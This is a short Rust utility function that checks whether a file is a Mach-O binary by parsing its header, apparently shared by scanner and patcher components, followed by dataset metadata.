//! Used by both scanners and patchers to ensure consistent detection
use object::FileKind;
use std::path::Path;
/// Check if a file is a Mach-O binary by parsing its header
///
/// Uses the exact same logic as the `MachO` scanner. Returns true if the file
/// can be parsed as a valid Mach-O binary.
#[must_use]
pub fn is_macho_file(path: &Path) -> bool {
if let Ok(data) = std::fs::read(path) {
FileKind::parse(&*data).is_ok()
} else {
false
}
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.